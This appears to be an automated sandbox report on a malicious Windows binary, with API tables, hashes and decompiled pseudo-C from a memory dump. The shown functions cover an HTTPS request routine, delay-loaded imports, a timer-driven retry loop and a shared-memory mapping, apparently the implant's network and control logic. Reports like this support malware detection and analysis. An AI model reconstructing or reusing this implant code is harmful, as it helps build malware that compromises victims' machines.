0x00cf1311
0x00cf1314
0x00cf1320
0x00cf132d
0x00cf132f
0x00cf1335
0x00cf133a
0x00cf1345
0x00cf1347
0x00cf134a
0x00cf134c
0x00cf1351
0x00cf1357
0x00cf135c
0x00cf135f
0x00cf1364
0x00cf1371
0x00cf1373
0x00cf1379
0x00cf1383
0x00cf1383
0x00cf1385
0x00cf138a
0x00cf138f
0x00cf1392
0x00cf1397
0x00cf13a4
0x00cf13a6
0x00cf13b4
0x00cf13b4
0x00cf13b6
0x00cf13c4
0x00cf13c9
0x00cf13cb
0x00cf13d0
0x00cf159f
0x00cf15a9
0x00cf15b2
0x00cf13d6
0x00cf13e2
0x00cf13e8
0x00cf13ed
0x00cf1593
0x00cf159d
0x00000000
0x00cf159d
0x00cf13f9
0x00cf13fe
0x00cf1407
0x00cf1418
0x00cf141c
0x00cf1425
0x00cf142b
0x00cf143a
0x00cf1441
0x00cf144a
0x00cf1450
0x00cf1587
0x00cf1591
0x00000000
0x00cf1591
0x00cf145c
0x00cf1462
0x00cf1467
0x00cf1468
0x00cf146f
0x00cf1474
0x00cf1479
0x00cf157d
0x00cf1585
0x00000000
0x00cf1585
0x00cf1482
0x00cf1489
0x00cf1491
0x00cf1496
0x00cf149f
0x00cf14a5
0x00cf14ac
0x00cf14b1
0x00cf14b6
0x00cf15b5
0x00cf1569
0x00cf1569
0x00cf156e
0x00cf1579
0x00cf157b
0x00000000
0x00cf157b
0x00cf14c0
0x00cf14c5
0x00cf14ca
0x00cf14cf
0x00cf14da
0x00cf14df
0x00cf14e2
0x00cf14e8
0x00cf14ee
0x00cf14f4
0x00cf14f7
0x00cf14fd
0x00cf1500
0x00cf1505
0x00cf1509
0x00cf1509
0x00cf1515
0x00cf1521
0x00cf1525
0x00cf1527
0x00cf152c
0x00cf152e
0x00cf1533
0x00cf1538
0x00cf1545
0x00cf154d
0x00cf1550
0x00cf1550
0x00cf152c
0x00000000
0x00cf1517
0x00cf151b
0x00cf1552
0x00cf1555
0x00cf155e
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf155e
0x00cf151d
0x00000000
0x00cf151d
0x00cf1515

APIs

GetTickCount.KERNEL32 ref: 00CF12D8
wsprintfA.USER32 ref: 00CF1328
wsprintfA.USER32 ref: 00CF1345
wsprintfA.USER32 ref: 00CF1371
HeapFree.KERNEL32(00000000,?), ref: 00CF1383
wsprintfA.USER32 ref: 00CF13A4
HeapFree.KERNEL32(00000000,?), ref: 00CF13B4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00CF13E2
GetTickCount.KERNEL32 ref: 00CF13F3
RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF1407
RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF1425

Part of subcall function 00CF1A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?,031795B0), ref: 00CF1A5B
Part of subcall function 00CF1A30: lstrlen.KERNEL32(?,?,?,00CF1EFB,?,031795B0), ref: 00CF1A63
Part of subcall function 00CF1A30: strcpy.NTDLL ref: 00CF1A7A
Part of subcall function 00CF1A30: lstrcat.KERNEL32(00000000,?), ref: 00CF1A85
Part of subcall function 00CF1A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF1AA2

StrTrimA.SHLWAPI(00000000,00CFC2A4,?,031795B0), ref: 00CF145C

Part of subcall function 00CF2773: lstrlen.KERNEL32(?,00000000,00000000,00CF1F32,616D692F,00000000), ref: 00CF277F
Part of subcall function 00CF2773: lstrlen.KERNEL32(?), ref: 00CF2787
Part of subcall function 00CF2773: lstrcpy.KERNEL32(00000000,?), ref: 00CF279E
Part of subcall function 00CF2773: lstrcat.KERNEL32(00000000,?), ref: 00CF27A9

lstrcpy.KERNEL32(00000000,?), ref: 00CF1489
lstrcpy.KERNEL32(?,?), ref: 00CF1491
lstrcat.KERNEL32(?,?), ref: 00CF149F
lstrcat.KERNEL32(?,00000000), ref: 00CF14A5

Part of subcall function 00CF978C: lstrlen.KERNEL32(?,00000000,00CFD330,00000001,00CF3435,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073), ref: 00CF9795
Part of subcall function 00CF978C: mbstowcs.NTDLL ref: 00CF97BC
Part of subcall function 00CF978C: memset.NTDLL ref: 00CF97CE

wcstombs.NTDLL ref: 00CF1538

Part of subcall function 00CF9561: SysAllocString.OLEAUT32(?), ref: 00CF959C
Part of subcall function 00CF9561: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00CF961F

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

HeapFree.KERNEL32(00000000,?,?), ref: 00CF1579
RtlFreeHeap.NTDLL(00000000,00000000,616D692F,00000000), ref: 00CF1585
RtlFreeHeap.NTDLL(00000000,?,?,031795B0), ref: 00CF1591
HeapFree.KERNEL32(00000000,?), ref: 00CF159D
RtlFreeHeap.NTDLL(00000000,?), ref: 00CF15A9

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: 2fb12e299d0b39162cc911d05a17c6cf8939603ef07a5df9fecfcb64b926cc1e
Instruction ID: acfdc035a2214616b4d61b126143c06edf67e2e24b4ccef72286f232b7e65dc3
Opcode Fuzzy Hash: 2fb12e299d0b39162cc911d05a17c6cf8939603ef07a5df9fecfcb64b926cc1e
Instruction Fuzzy Hash: F5911671A00208EFCB51EFA4DD89BBE7BB9EF48310B154054FA0AD7260DB31DA51DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CFA934, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00CFA934(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E00CF8D59(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E00CF677C(_t56);
					} else {
						E00CF677C( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E00CFA8C9) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E00CF9837( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0xcfd2a4; // 0x247a5a8
						_t15 = _t59 + 0xcfe743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65);
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x00cfa934
0x00cfa934
0x00cfa93f
0x00cfa946
0x00cfa94e
0x00cfa958
0x00cfa95e
0x00cfa971
0x00cfa981
0x00cfa973
0x00cfa976
0x00cfa97b
0x00cfa97b
0x00cfa971
0x00cfa991
0x00cfa997
0x00cfa99c
0x00cfaa88
0x00000000
0x00cfa9b7
0x00cfa9ba
0x00cfa9d0
0x00cfa9d6
0x00cfa9db
0x00cfaa03
0x00cfaa16
0x00cfaa20
0x00cfaa23
0x00cfaa29
0x00cfaa2e
0x00000000
0x00000000
0x00cfaa32
0x00cfaa3e
0x00cfaa4f
0x00cfaa51
0x00cfaa62
0x00cfaa62
0x00cfaa72
0x00000000
0x00cfaa84
0x00000000
0x00cfaa84
0x00000000
0x00000000
0x00000000
0x00cfa9db

APIs

lstrlen.KERNEL32(?,00000008,74B04D40), ref: 00CFA946

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 00CFA969
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 00CFA991
InternetSetStatusCallback.WININET(00000000,00CFA8C9), ref: 00CFA9A8
ResetEvent.KERNEL32(?), ref: 00CFA9BA
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 00CFA9D0
GetLastError.KERNEL32 ref: 00CFA9DD
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 00CFAA23
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 00CFAA41
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 00CFAA62
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 00CFAA6E
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 00CFAA7E
GetLastError.KERNEL32 ref: 00CFAA88

Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788

Strings

b`p, xrefs: 00CFAA23

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: b`p
API String ID: 2290446683-4292703735
Opcode ID: f248915b05886b0eb3893ae463dd7dfdb8cb6431cb4a3c528da4ffc70831f48d
Instruction ID: 9f19a5cb1542f2cec023f9e7849237a1b5af2f24062de98dd610aef51e036ccc
Opcode Fuzzy Hash: f248915b05886b0eb3893ae463dd7dfdb8cb6431cb4a3c528da4ffc70831f48d
Instruction Fuzzy Hash: 23416DB1500208BFD7319FA1DD88F7FBBBDEB49740B104929F617910A0DB71AA49DB22

Uniqueness

Uniqueness Score: -1.00%

Function 00CFAD65, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00CFAD65(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xcf0000;
				_t115 = _t139[3] + 0xcf0000;
				_t131 = _t139[4] + 0xcf0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xcf0000;
				_v16 = _t139[5] + 0xcf0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xcf0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xcfd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xcfd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xcfd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xcfd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xcfd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xcfd198; // 0x0
										 *_t102 = _t125;
										 *0xcfd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xcfd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x00cfad74
0x00cfad8a
0x00cfad90
0x00cfad92
0x00cfad97
0x00cfad9d
0x00cfada2
0x00cfada5
0x00cfadb3
0x00cfadba
0x00cfadbd
0x00cfadc0
0x00cfadc1
0x00cfadc4
0x00cfadc7
0x00cfadca
0x00cfadcf
0x00cfadde
0x00000000
0x00cfade4
0x00cfadee
0x00cfadf8
0x00cfadfd
0x00cfadff
0x00cfae09
0x00cfae0c
0x00cfae0f
0x00cfae15
0x00cfae17
0x00cfae17
0x00cfae1a
0x00cfae1d
0x00cfae22
0x00cfae26
0x00cfae39
0x00cfae3b
0x00cfaee3
0x00cfaee3
0x00cfaeea
0x00cfaeed
0x00cfaef7
0x00cfaef7
0x00cfaefb
0x00cfaf79
0x00cfaf7c
0x00cfaf7e
0x00cfaf7e
0x00cfaf85
0x00cfaf87
0x00cfaf91
0x00cfaf94
0x00cfaf97
0x00cfaf97
0x00000000
0x00cfaefd
0x00cfaf00
0x00cfaf2e
0x00cfaf38
0x00cfaf3c
0x00cfaf44
0x00cfaf47
0x00cfaf4e
0x00cfaf58
0x00cfaf58
0x00cfaf5c
0x00cfaf61
0x00cfaf70
0x00cfaf76
0x00cfaf76
0x00cfaf5c
0x00000000
0x00cfaf07
0x00cfaf0a
0x00cfaf12
0x00cfaf27
0x00cfaf2c
0x00000000
0x00000000
0x00cfaf2c
0x00000000
0x00cfaf12
0x00cfaf00
0x00cfaefb
0x00cfae41
0x00cfae48
0x00cfae58
0x00cfae5b
0x00cfae61
0x00cfae65
0x00cfaea8
0x00cfaeb4
0x00cfaedd
0x00cfaeb6
0x00cfaeba
0x00cfaec0
0x00cfaec8
0x00cfaeca
0x00cfaecd
0x00cfaed3
0x00cfaed5
0x00cfaed5
0x00cfaec8
0x00cfaeba
0x00000000
0x00cfaeb4
0x00cfae6d
0x00cfae70
0x00cfae77
0x00cfae87
0x00cfae8a
0x00cfae9a
0x00000000
0x00cfaea0
0x00cfae81
0x00cfae85
0x00000000
0x00000000
0x00000000
0x00cfae85
0x00cfae52
0x00cfae56
0x00000000
0x00000000
0x00000000
0x00cfae56
0x00cfae2f
0x00cfae33
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CFADDE
LoadLibraryA.KERNELBASE(?), ref: 00CFAE5B
GetLastError.KERNEL32 ref: 00CFAE67
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00CFAE9A

Strings

$, xrefs: 00CFADB3

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 4ba777b2d85fbd5ea35824c02ea9ae3a50b1dc3e3c912f7261e43a472d427604
Instruction ID: ce3c77e3e6e37604c4b3db00517bc897570d4a265a2944c4aab16081f0e26725
Opcode Fuzzy Hash: 4ba777b2d85fbd5ea35824c02ea9ae3a50b1dc3e3c912f7261e43a472d427604
Instruction Fuzzy Hash: 10813DB5A00209AFDB54CF98D984BBDB7F5EF58310F108029E619D7350EB70EA45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00CF27F7, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CF27F7(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xcfd240);
					_v20 = 0;
					_v16 = 0;
					L00CFB048();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xcfd26c; // 0x270
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xcfd24c = 5;
						} else {
							_t68 = E00CF5C8C(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xcfd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00CF9425(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00CF4CBE(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xcfd244);
							goto L21;
						} else {
							__eflags =  *0xcfd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00CF5BEA();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xcfd248);
								L21:
								L00CFB048();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xcfd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00cf27f7
0x00cf2809
0x00cf280c
0x00cf2818
0x00cf281e
0x00cf2823
0x00cf298a
0x00cf2829
0x00cf2829
0x00cf282b
0x00cf2830
0x00cf2831
0x00cf2837
0x00cf283a
0x00cf283d
0x00cf284b
0x00cf2856
0x00cf2859
0x00cf285b
0x00cf2868
0x00cf2872
0x00cf2874
0x00cf2879
0x00cf287e
0x00cf2889
0x00cf2889
0x00cf2880
0x00cf2880
0x00cf2887
0x00000000
0x00000000
0x00cf2887
0x00cf2893
0x00000000
0x00cf2896
0x00cf289a
0x00cf28a5
0x00cf28a5
0x00cf28ac
0x00cf28b5
0x00cf28bc
0x00cf28c5
0x00cf28c8
0x00cf28cb
0x00cf28d0
0x00cf28d5
0x00000000
0x00000000
0x00cf28d7
0x00cf28da
0x00cf28dd
0x00cf28e0
0x00000000
0x00cf28e2
0x00cf28f1
0x00cf28f1
0x00000000
0x00cf291f
0x00cf291f
0x00cf2924
0x00cf2943
0x00cf2945
0x00cf294a
0x00cf294b
0x00000000
0x00cf2926
0x00cf2926
0x00cf292c
0x00000000
0x00cf292e
0x00cf292e
0x00cf2933
0x00cf2935
0x00cf293a
0x00cf293b
0x00cf2951
0x00cf2951
0x00cf2959
0x00cf2964
0x00cf2967
0x00cf2972
0x00cf2974
0x00cf2977
0x00cf2979
0x00000000
0x00cf297f
0x00000000
0x00cf297f
0x00cf2979
0x00cf292c
0x00000000
0x00cf2924
0x00cf28f4
0x00cf28f6
0x00cf28f9
0x00cf28fa
0x00cf28fa
0x00cf28fe
0x00cf2908
0x00cf2908
0x00cf290e
0x00cf2911
0x00cf2911
0x00cf2917
0x00cf2917
0x00cf2994
0x00000000

APIs

memset.NTDLL ref: 00CF280C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00CF2818
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00CF283D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00CF2859
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00CF2872
HeapFree.KERNEL32(00000000,00000000), ref: 00CF2908
CloseHandle.KERNEL32(?), ref: 00CF2917
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00CF2951
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00CF50A1,?), ref: 00CF2967
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00CF2972

Part of subcall function 00CF5C8C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03179378,00000000,?,74B5F710,00000000,74B5F730), ref: 00CF5CDB
Part of subcall function 00CF5C8C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031793B0,?,00000000,30314549,00000014,004F0053,0317936C), ref: 00CF5D78
Part of subcall function 00CF5C8C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00CF2885), ref: 00CF5D8A

GetLastError.KERNEL32 ref: 00CF2984

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: f41c64830633dd4fc1b42ec5a03a21483de84e5409aebe6d6f5baf35c7154d20
Instruction ID: 8ab64411d85c9a4b20083f322682ce9162f784faecbad094600935e6f9c836ed
Opcode Fuzzy Hash: f41c64830633dd4fc1b42ec5a03a21483de84e5409aebe6d6f5baf35c7154d20
Instruction Fuzzy Hash: B0515BB190122CABCB10DF95DC84EFEBFB9EF49760F204615F621A2190C7708A44DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10001266, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10001266(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002070();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004144;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000206A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x10001266
0x1000126f
0x10001273
0x10001279
0x1000127e
0x10001283
0x10001286
0x10001289
0x1000128e
0x1000128f
0x10001292
0x1000129d
0x100012a4
0x100012a8
0x100012aa
0x100012ab
0x100012ae
0x100012b3
0x100012bd
0x100012bf
0x100012bf
0x100012d3
0x100012d9
0x100012dd
0x1000132d
0x100012df
0x100012e8
0x100012fe
0x10001306
0x10001318
0x1000131c
0x00000000
0x00000000
0x10001308
0x1000130b
0x10001310
0x10001312
0x10001312
0x100012f3
0x100012f5
0x1000131e
0x1000131f
0x1000131f
0x100012e8
0x10001335

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?,?), ref: 10001273
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001289
_snwprintf.NTDLL ref: 100012AE
CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 100012D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 100012EA
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 100012FE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 10001316
